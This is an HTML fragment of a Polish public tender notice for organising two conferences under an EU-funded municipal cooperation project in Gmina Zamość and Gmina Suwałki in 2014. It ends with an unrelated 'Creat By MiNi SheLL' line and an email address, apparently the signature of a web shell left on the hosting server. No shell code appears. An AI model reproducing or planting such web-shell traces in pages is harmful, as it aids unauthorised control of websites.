<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Organizacja konferencji w ramach projektu pn: Rozwój i współpraca pierścieniowych gmin Polski Wschodniej - konferencje w Gminie Suwałki i Gminie Zamość.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
zapewnienie zakwaterowania dla uczestników,
zapewnienie usługi cateringowej, 
wykonanie i druk zaproszeń i plakatów na konferencję, 
wykonanie zestawów konferencyjnych, 
wynajem sali konferencyjnej z wyposażeniem
Czas trwania każdej konferencji 10 godzin zegarowych: ( 1 dzień - 5 godzin, 2 dzień- 5 godzin).


Konferencja na terenie miasta Zamość lub gminy Zamość organizowana w dniach 8-9 maj 2014r.- część 1 zadania. 
Ilość uczestników konferencji: 70 osób 

Szczegółowy opis zamówienia Zamawiający zamieścił na stronie internetowej http://ugzamosc.bip.lubelskie.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 55.10.00.00-1, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 39.29.41.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja konferencji w ramach projektu pn: Rozwój i współpraca pierścieniowych gmin Polski Wschodniej - konferencje w Gminie Suwałki i Gminie Zamość.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
zapewnienie zakwaterowania dla uczestników,
zapewnienie usługi cateringowej, 
wykonanie i druk zaproszeń i plakatów na konferencję, 
wykonanie zestawów konferencyjnych, 
wynajem sali konferencyjnej z wyposażeniem
Czas trwania każdej konferencji 10 godzin zegarowych: ( 1 dzień - 5 godzin, 2 dzień- 5 godzin)
Konferencja na terenie gminy Suwałki organizowana w dniach 11-12 wrzesień 2014r- część 2 zadania. 
Ilość uczestników konferencji: 85 osób 

Szczegółowy opis zamówienia Zamawiający zamieścił na stronie internetowej http://ugzamosc.bip.lubelskie.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.00.00.00-0, 55.10.00.00-1, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 39.29.41.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 2.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com